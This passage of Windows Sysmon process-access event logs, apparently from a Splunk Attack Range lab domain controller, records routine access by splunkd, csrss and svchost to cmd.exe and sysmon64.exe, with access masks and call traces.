Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001013BA0500}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001013BA0500}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001013BA0500}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
